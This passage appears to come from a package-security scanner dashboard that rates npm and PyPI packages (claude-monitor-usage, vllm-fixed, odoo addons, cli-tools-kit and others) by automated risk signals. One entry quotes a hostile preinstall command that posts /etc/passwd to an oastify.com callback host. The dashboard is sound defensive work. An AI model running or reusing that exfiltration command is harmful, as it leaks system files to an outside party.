  • HIGHSOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in package/src/generate.js:2903 (+1 more occurrence(s) elsewhere)
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in package/src/generate.js:167 (+1 more occurrence(s) elsewhere)
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'execSync/spawnSync' found in package/src/server.js:104
Static code signals:
  • MISSING_SOURCE_REPOSITORY_URL
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'new Function()' found in package/src/generate.js:6790 (+1 more occurrence(s) elsewhere)
  • SOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in package/src/generate.js:2903 (+1 more occurrence(s) elsewhere)
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in package/src/generate.js:167 (+1 more occurrence(s) elsewhere)
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'execSync/spawnSync' found in package/src/server.js:104
  • SOURCE_CODE_DYNAMIC_CODE_LOADER: execution primitive combined with decode/network/obfuscation call in package/src/server.js

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on npm →
190 164d 39 3,291 ↑0.2/day
Very Risky
claude pypi 2.6.1 audi63 🪝
Claimed homepage: https://pypi.org/project/claude-monitor-usage/
Matched naming pattern: claude-claude-usage
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 164
Registry downloads: 39/month, 9/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 3291 lines, 150.8 kB across 21 files (LARGE_CODEBASE)
Automated signals flagged:
  • HIGHClaims critical enterprise brand identity ('CLAUDE').
  • HIGHPublisher email 'None' is not affiliated with official vendor domain.
  • HIGHPackage registered recently (158 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in claude_monitor_usage-2.6.1/src/claude_usage_monitor/api.py:190
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in claude_monitor_usage-2.6.1/src/claude_usage_monitor/api.py:54
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in claude_monitor_usage-2.6.1/src/claude_usage_monitor/autostart.py:76
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in claude_monitor_usage-2.6.1/src/claude_usage_monitor/autostart.py:30
  • HIGHSYSTEM_PERSISTENCE_TAMPERING: 'Shortcut Hijacking (.lnk Rewrite / Browser Extension Sideload)' found in claude_monitor_usage-2.6.1/src/claude_usage_monitor/autostart.py:67
Static code signals:
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in claude_monitor_usage-2.6.1/src/claude_usage_monitor/api.py:190
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in claude_monitor_usage-2.6.1/src/claude_usage_monitor/api.py:54
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in claude_monitor_usage-2.6.1/src/claude_usage_monitor/autostart.py:76
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in claude_monitor_usage-2.6.1/src/claude_usage_monitor/autostart.py:30
  • SYSTEM_PERSISTENCE_TAMPERING: 'Shortcut Hijacking (.lnk Rewrite / Browser Extension Sideload)' found in claude_monitor_usage-2.6.1/src/claude_usage_monitor/autostart.py:67
  • SOURCE_CODE_PERSISTENT_BACKDOOR: persistence mechanism combined with execution/network in claude_monitor_usage-2.6.1/src/claude_usage_monitor/autostart.py
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in claude_monitor_usage-2.6.1/src/claude_usage_monitor/cache.py:17
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in claude_monitor_usage-2.6.1/src/claude_usage_monitor/config.py:37

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
190 340d 0 124,889 ↑0.0/day
Very Risky
vllm pypi 1.0.0 vLLM Team 🪝
Claimed homepage: https://pypi.org/project/vllm-fixed/
Matched naming pattern: python-vllm-fixed
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 340
Code-only verdict: SUSPICIOUS (the score above also weighs naming and publisher-domain signals, not just the code itself)
Registry downloads: 0/month, 0/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 124889 lines, 6.2 MB across 788 files (LARGE_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage name 'vllm-fixed' matches AI hallucination template [python] + [vllm] + [fixed].
  • HIGHClaims critical enterprise brand identity ('VLLM').
  • HIGHPublisher email 'None' is not affiliated with official vendor domain.
  • MEDIUMPackage registered 334 days ago within the 1-year AI tool proliferation window.
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in vllm_fixed-1.0.0/.buildkite/check-wheel-size.py:11
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in vllm_fixed-1.0.0/.buildkite/nightly-benchmarks/scripts/summary-nightly-results.py:72
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in vllm_fixed-1.0.0/benchmarks/backend_request_func.py:275
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in vllm_fixed-1.0.0/benchmarks/benchmark_utils.py:19
Static code signals:
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in vllm_fixed-1.0.0/.buildkite/check-wheel-size.py:11
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in vllm_fixed-1.0.0/.buildkite/nightly-benchmarks/scripts/summary-nightly-results.py:72
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in vllm_fixed-1.0.0/benchmarks/backend_request_func.py:275
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in vllm_fixed-1.0.0/benchmarks/benchmark_utils.py:19
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in vllm_fixed-1.0.0/benchmarks/disagg_benchmarks/disagg_prefill_proxy_server.py:16
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in vllm_fixed-1.0.0/benchmarks/kernels/benchmark_aqlm.py:16
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in vllm_fixed-1.0.0/benchmarks/kernels/benchmark_machete.py:36
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in vllm_fixed-1.0.0/csrc/moe/marlin_moe_wna16/generate_kernels.py:50

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
190 426d 247 10 ↑0.6/day
Very Risky
google npm 2.2.2 kasim-bugcrowd 🪝
Matched naming pattern: ringcentral-google-drive
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 426
Registry downloads: 247/month, 61/week (MODERATE_USAGE)
Codebase size: 10 lines, 403 Bytes across 1 file (TINY_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage name 'ringcentral-google-drive-notification-add-in' matches AI hallucination template [ringcentral] + [google] + [drive].
  • HIGHClaims critical enterprise brand identity ('GOOGLE').
  • HIGHPublisher email 'None' is not affiliated with official vendor domain.
  • HIGHLIFECYCLE_SCRIPT: 'preinstall' -> '/usr/bin/curl --data '@/etc/passwd' $(hostname).tsp768bg6f5vqke8q8r5twahj8pzdq1f.oastify.com'
  • CRITICALSUSPICIOUS_SHELL_COMMAND: Pattern 'curl' in 'preinstall' script
  • HIGHMISSING_SOURCE_REPOSITORY_URL
  • INFOModerate community usage with 247 monthly downloads.
Static code signals:
  • LIFECYCLE_SCRIPT: 'preinstall' -> '/usr/bin/curl --data '@/etc/passwd' $(hostname).tsp768bg6f5vqke8q8r5twahj8pzdq1f.oastify.com'
  • SUSPICIOUS_SHELL_COMMAND: Pattern 'curl' in 'preinstall' script
  • MISSING_SOURCE_REPOSITORY_URL

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on npm →
190 1667d 14 176 ↑0.0/day
Very Risky
google pypi 8.0.1.0.0.99.dev5 Akretion 🪝
Claimed homepage: https://www.akretion.com
Matched naming pattern: odoo8-google-shopinvader
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 1667
Registry downloads: 14/month, 5/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 176 lines, 7.7 kB across 8 files (MODERATE_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage name 'odoo8-addon-shopinvader-google-shopping' matches AI hallucination template [odoo8] + [google] + [shopinvader].
  • HIGHClaims critical enterprise brand identity ('GOOGLE').
  • HIGHPublisher email 'None' is not affiliated with official vendor domain.
  • INFOEstablished pre-AI legacy package registered 1661 days ago (predates modern AI hallucination waves).
  • CRITICALPYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'sys' imported in odoo8_addon_shopinvader_google_shopping-8.0.1.0.0.99.dev5-py3.8-nspkg.pth: 'import sys, types, os;has_mfs = sys.version_info > (3, 5);p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo'
  • CRITICALPYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'os' imported in odoo8_addon_shopinvader_google_shopping-8.0.1.0.0.99.dev5-py3.8-nspkg.pth: 'import sys, types, os;has_mfs = sys.version_info > (3, 5);p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo'
Static code signals:
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'sys' imported in odoo8_addon_shopinvader_google_shopping-8.0.1.0.0.99.dev5-py3.8-nspkg.pth: 'import sys, types, os;has_mfs = sys.version_info > (3, 5);p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo'
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'os' imported in odoo8_addon_shopinvader_google_shopping-8.0.1.0.0.99.dev5-py3.8-nspkg.pth: 'import sys, types, os;has_mfs = sys.version_info > (3, 5);p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo'

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
190 1667d 16 56 ↑0.0/day
Very Risky
stripe pypi 8.0.1.0.0.99.dev6 Akretion 🪝
Claimed homepage: https://akretion.com
Matched naming pattern: odoo8-stripe-shopinvader
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 1667
Registry downloads: 16/month, 4/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 56 lines, 2.3 kB across 4 files (TINY_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage name 'odoo8-addon-shopinvader-stripe' matches AI hallucination template [odoo8] + [stripe] + [shopinvader].
  • HIGHClaims critical enterprise brand identity ('STRIPE').
  • HIGHPublisher email 'None' is not affiliated with official vendor domain.
  • INFOEstablished pre-AI legacy package registered 1661 days ago (predates modern AI hallucination waves).
  • CRITICALPYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'sys' imported in odoo8_addon_shopinvader_stripe-8.0.1.0.0.99.dev6-py3.8-nspkg.pth: 'import sys, types, os;has_mfs = sys.version_info > (3, 5);p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo'
  • CRITICALPYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'os' imported in odoo8_addon_shopinvader_stripe-8.0.1.0.0.99.dev6-py3.8-nspkg.pth: 'import sys, types, os;has_mfs = sys.version_info > (3, 5);p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo'
Static code signals:
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'sys' imported in odoo8_addon_shopinvader_stripe-8.0.1.0.0.99.dev6-py3.8-nspkg.pth: 'import sys, types, os;has_mfs = sys.version_info > (3, 5);p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo'
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'os' imported in odoo8_addon_shopinvader_stripe-8.0.1.0.0.99.dev6-py3.8-nspkg.pth: 'import sys, types, os;has_mfs = sys.version_info > (3, 5);p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo'

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
190 3442d 8 31 ↑0.0/day
Very Risky
google pypi 9.0.1.0.0 ABF OSIELL, Odoo Community Association (OCA) support@odoo-community.org odoo-community.org 🪝
Claimed homepage: https://pypi.org/project/odoo9-addon-website-google-tag-manager/
Matched naming pattern: django-google-auth
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 3442
Registry downloads: 8/month, 2/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 31 lines, 1.4 kB across 5 files (TINY_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage name 'odoo9-addon-website-google-tag-manager' matches AI hallucination template [django] + [google] + [auth].
  • HIGHClaims critical enterprise brand identity ('GOOGLE').
  • HIGHPublisher email 'support@odoo-community.org' is not affiliated with official vendor domain.
  • INFOEstablished pre-AI legacy package registered 3436 days ago (predates modern AI hallucination waves).
  • CRITICALPYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'sys' imported in odoo9_addon_website_google_tag_manager-9.0.1.0.0-py2.7-nspkg.pth: 'import sys, types, os;p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo_addons',));ie = os.path.exists(os.p'
  • CRITICALPYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'os' imported in odoo9_addon_website_google_tag_manager-9.0.1.0.0-py2.7-nspkg.pth: 'import sys, types, os;p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo_addons',));ie = os.path.exists(os.p'
Static code signals:
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'sys' imported in odoo9_addon_website_google_tag_manager-9.0.1.0.0-py2.7-nspkg.pth: 'import sys, types, os;p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo_addons',));ie = os.path.exists(os.p'
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'os' imported in odoo9_addon_website_google_tag_manager-9.0.1.0.0-py2.7-nspkg.pth: 'import sys, types, os;p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo_addons',));ie = os.path.exists(os.p'

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
185 627d 692 18,376 ↑1.1/day
Very Risky
llama pypi 0.1.4 staneyffer@gmail.com gmail.com 🪝
Claimed homepage: https://pypi.org/project/llama-cpp-server-py-core/
Matched naming pattern: llama-llama-server
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 627
Registry downloads: 692/month, 186/week (MODERATE_USAGE)
Codebase size: 18376 lines, 1.0 MB across 44 files (LARGE_CODEBASE)
Automated signals flagged:
  • HIGHClaims critical enterprise brand identity ('LLAMA').
  • HIGHPublisher email 'staneyffer@gmail.com' is not affiliated with official vendor domain.
  • MEDIUMPackage has empty or near-zero description (potential reservation stub).
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in llama_cpp_server_py_core-0.1.4/llama.cpp/convert_hf_to_gguf.py:28
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in llama_cpp_server_py_core-0.1.4/llama.cpp/convert_llama_ggml_to_gguf.py:14
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in llama_cpp_server_py_core-0.1.4/llama.cpp/convert_lora_to_gguf.py:22
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in llama_cpp_server_py_core-0.1.4/llama.cpp/ggml/src/ggml-kompute/kompute/scripts/convert_shaders.py:100
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in llama_cpp_server_py_core-0.1.4/llama.cpp/ggml/src/ggml-kompute/kompute/setup.py:25
Static code signals:
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in llama_cpp_server_py_core-0.1.4/llama.cpp/convert_hf_to_gguf.py:28
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in llama_cpp_server_py_core-0.1.4/llama.cpp/convert_llama_ggml_to_gguf.py:14
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in llama_cpp_server_py_core-0.1.4/llama.cpp/convert_lora_to_gguf.py:22
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in llama_cpp_server_py_core-0.1.4/llama.cpp/ggml/src/ggml-kompute/kompute/scripts/convert_shaders.py:100
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in llama_cpp_server_py_core-0.1.4/llama.cpp/ggml/src/ggml-kompute/kompute/setup.py:25
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in llama_cpp_server_py_core-0.1.4/llama.cpp/ggml/src/ggml-kompute/kompute/setup.py:56
  • SUSPICIOUS_OBFUSCATION: 'Dense Hex Escape Sequences' found in llama_cpp_server_py_core-0.1.4/llama.cpp/gguf-py/gguf/quants.py:660
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in llama_cpp_server_py_core-0.1.4/llama.cpp/gguf-py/gguf/scripts/gguf_convert_endian.py:14

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
180 4d 0 8,082 ↑0.0/day
Very Risky
cli pypi 0.6.0 Steffen Probst 🪝
Claimed homepage: https://pypi.org/project/cli-tools-kit/
Matched naming pattern: python-cli-general
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 4
Registry downloads: 0/month, 0/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 8082 lines, 426.5 kB across 20 files (LARGE_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage published 5+ versions in rapid succession (< 24h) to mimic mature open source maintenance.
  • HIGHPackage registered recently (0 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in cli_tools_kit-0.6.0/cli_tools_kit/cron_installer.py:72
  • HIGHSYSTEM_PERSISTENCE_TAMPERING: 'System Persistence Implant (systemd/cron/registry)' found in cli_tools_kit-0.6.0/cli_tools_kit/cron_installer.py:64
  • CRITICALSOURCE_CODE_PERSISTENT_BACKDOOR: persistence mechanism combined with execution/network in cli_tools_kit-0.6.0/cli_tools_kit/cron_installer.py
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in cli_tools_kit-0.6.0/cli_tools_kit/gui_installer.py:485
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in cli_tools_kit-0.6.0/cli_tools_kit/gui_installer.py:1097
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in cli_tools_kit-0.6.0/cli_tools_kit/host.py:224
Static code signals:
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in cli_tools_kit-0.6.0/cli_tools_kit/cron_installer.py:72
  • SYSTEM_PERSISTENCE_TAMPERING: 'System Persistence Implant (systemd/cron/registry)' found in cli_tools_kit-0.6.0/cli_tools_kit/cron_installer.py:64
  • SOURCE_CODE_PERSISTENT_BACKDOOR: persistence mechanism combined with execution/network in cli_tools_kit-0.6.0/cli_tools_kit/cron_installer.py
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in cli_tools_kit-0.6.0/cli_tools_kit/gui_installer.py:485
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in cli_tools_kit-0.6.0/cli_tools_kit/gui_installer.py:1097
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in cli_tools_kit-0.6.0/cli_tools_kit/host.py:224
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in cli_tools_kit-0.6.0/cli_tools_kit/host.py:160
  • SYSTEM_PERSISTENCE_TAMPERING: 'Shortcut Hijacking (.lnk Rewrite / Browser Extension Sideload)' found in cli_tools_kit-0.6.0/cli_tools_kit/host.py:193

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
180 6d 0 9,502 ↑0.0/day
Very Risky
graphban pypi 0.1.0 🪝
Claimed homepage: https://pypi.org/project/graphban-fleet/
Matched naming pattern: python-graphban-general
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 6
Registry downloads: 0/month, 0/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 9502 lines, 570.3 kB across 43 files (LARGE_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage published 5+ versions in rapid succession (< 24h) to mimic mature open source maintenance.
  • HIGHPackage registered recently (0 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in graphban_fleet-0.1.0/scripts/verify_hostos_windows.py:43
  • HIGHANTI_ANALYSIS_EVASION: 'Extended Scanner Timeout Stall' found in graphban_fleet-0.1.0/scripts/verify_hostos_windows.py:51
  • CRITICALSOURCE_CODE_EVASIVE_PAYLOAD: anti-analysis evasion combined with execution/payload hook in graphban_fleet-0.1.0/scripts/verify_hostos_windows.py
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in graphban_fleet-0.1.0/src/gbagent/cli.py:68
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in graphban_fleet-0.1.0/src/gbagent/config.py:170
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in graphban_fleet-0.1.0/src/gbagent/verify.py:87
Static code signals:
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in graphban_fleet-0.1.0/scripts/verify_hostos_windows.py:43
  • ANTI_ANALYSIS_EVASION: 'Extended Scanner Timeout Stall' found in graphban_fleet-0.1.0/scripts/verify_hostos_windows.py:51
  • SOURCE_CODE_EVASIVE_PAYLOAD: anti-analysis evasion combined with execution/payload hook in graphban_fleet-0.1.0/scripts/verify_hostos_windows.py
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in graphban_fleet-0.1.0/src/gbagent/cli.py:68
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in graphban_fleet-0.1.0/src/gbagent/config.py:170
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in graphban_fleet-0.1.0/src/gbagent/verify.py:87
  • CREDENTIAL_PATH_HARVESTING: 'System Credentials (/etc/shadow, /etc/passwd)' found in graphban_fleet-0.1.0/src/gbagent/workspace.py:13
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in graphban_fleet-0.1.0/src/gbfleet/cli.py:382

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
180 277d 26 857 ↑0.1/day
Very Risky
llama pypi 0.2.0 oloruntoba.madamori@totogi.com totogi.com 🪝 📦
Claimed homepage: https://pypi.org/project/llama-mcp-server/
Matched naming pattern: llama-llama-server
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 277
Registry downloads: 26/month, 5/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 857 lines, 40.1 kB across 5 files (MODERATE_CODEBASE)
Automated signals flagged:
  • HIGHClaims critical enterprise brand identity ('LLAMA').
  • HIGHPublisher email 'oloruntoba.madamori@totogi.com' is not affiliated with official vendor domain.
  • MEDIUMPackage registered 270 days ago within the 1-year AI tool proliferation window.
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in llama_mcp_server-0.2.0/test.py:5
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in llama_mcp_server-0.2.0/llamacloud_mcp/main.py:172
  • CRITICALPYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'os' imported in llama_mcp_server-0.2.0/venv/Lib/site-packages/distutils-precedence.pth: 'import os; var = 'SETUPTOOLS_USE_DISTUTILS'; enabled = os.environ.get(var, 'local') == 'local'; enabled and __import__(''
  • HIGHPYTHON_PTH_STARTUP_HOOK: Startup .pth file declared in package: llama_mcp_server-0.2.0/venv/Lib/site-packages/pywin32.pth
  • HIGHBUNDLED_NATIVE_BINARY: Unexpected compiled binary 'llama_mcp_server-0.2.0/venv/Scripts/docutils.exe' in package archive
Static code signals:
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in llama_mcp_server-0.2.0/test.py:5
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in llama_mcp_server-0.2.0/llamacloud_mcp/main.py:172
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'os' imported in llama_mcp_server-0.2.0/venv/Lib/site-packages/distutils-precedence.pth: 'import os; var = 'SETUPTOOLS_USE_DISTUTILS'; enabled = os.environ.get(var, 'local') == 'local'; enabled and __import__(''
  • PYTHON_PTH_STARTUP_HOOK: Startup .pth file declared in package: llama_mcp_server-0.2.0/venv/Lib/site-packages/pywin32.pth
  • BUNDLED_NATIVE_BINARY: Unexpected compiled binary 'llama_mcp_server-0.2.0/venv/Scripts/docutils.exe' in package archive
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in llama_mcp_server-0.2.0/venv/Scripts/pywin32_testall.py:25

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
175 203d 37 135 ↑0.2/day
Very Risky
kraken pypi 0.7.0 darkglasses1122@gmail.com gmail.com 🪝
Claimed homepage: https://pypi.org/project/skelform-kraken/
Matched naming pattern: python-kraken-skelform
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 203
Registry downloads: 37/month, 8/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 135 lines, 6.2 kB across 1 file (TINY_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage name 'skelform-kraken' matches AI hallucination template [python] + [kraken] + [skelform].
  • HIGHClaims critical enterprise brand identity ('KRAKEN').
  • HIGHPublisher email 'darkglasses1122@gmail.com' is not affiliated with official vendor domain.
  • MEDIUMPackage registered 197 days ago within the 1-year AI tool proliferation window.
  • CRITICALPYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'os' imported in skelform_kraken-0.7.0/venv/lib/python3.14/site-packages/distutils-precedence.pth: 'import os; var = 'SETUPTOOLS_USE_DISTUTILS'; enabled = os.environ.get(var, 'local') == 'local'; enabled and __import__(''
Static code signals:
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'os' imported in skelform_kraken-0.7.0/venv/lib/python3.14/site-packages/distutils-precedence.pth: 'import os; var = 'SETUPTOOLS_USE_DISTUTILS'; enabled = os.environ.get(var, 'local') == 'local'; enabled and __import__(''

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
175 691d 5 537 ↑0.0/day
Very Risky
sol pypi 0.0.3 smbd0x@rambler.ru rambler.ru 🪝 📦
Claimed homepage: https://pypi.org/project/ultimate-sol/
Matched naming pattern: python-sol-ultimate
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 691
Registry downloads: 5/month, 3/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 537 lines, 22.1 kB across 7 files (MODERATE_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage name 'ultimate-sol' matches AI hallucination template [python] + [sol] + [ultimate].
  • HIGHClaims critical enterprise brand identity ('SOL').
  • HIGHPublisher email 'smbd0x@rambler.ru' is not affiliated with official vendor domain.
  • HIGHPYTHON_PTH_STARTUP_HOOK: Startup .pth file declared in package: ultimate_sol-0.0.3/venv/Lib/site-packages/_virtualenv.pth
  • CRITICALPYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'os' imported in ultimate_sol-0.0.3/venv/Lib/site-packages/distutils-precedence.pth: 'import os; var = 'SETUPTOOLS_USE_DISTUTILS'; enabled = os.environ.get(var, 'local') == 'local'; enabled and __import__(''
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in ultimate_sol-0.0.3/venv/Scripts/activate_this.py:24
  • HIGHBUNDLED_NATIVE_BINARY: Unexpected compiled binary 'ultimate_sol-0.0.3/venv/Scripts/base58.exe' in package archive
  • INFOSubstantial functional codebase (537 LOC across 7 file(s)).
Static code signals:
  • PYTHON_PTH_STARTUP_HOOK: Startup .pth file declared in package: ultimate_sol-0.0.3/venv/Lib/site-packages/_virtualenv.pth
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'os' imported in ultimate_sol-0.0.3/venv/Lib/site-packages/distutils-precedence.pth: 'import os; var = 'SETUPTOOLS_USE_DISTUTILS'; enabled = os.environ.get(var, 'local') == 'local'; enabled and __import__(''
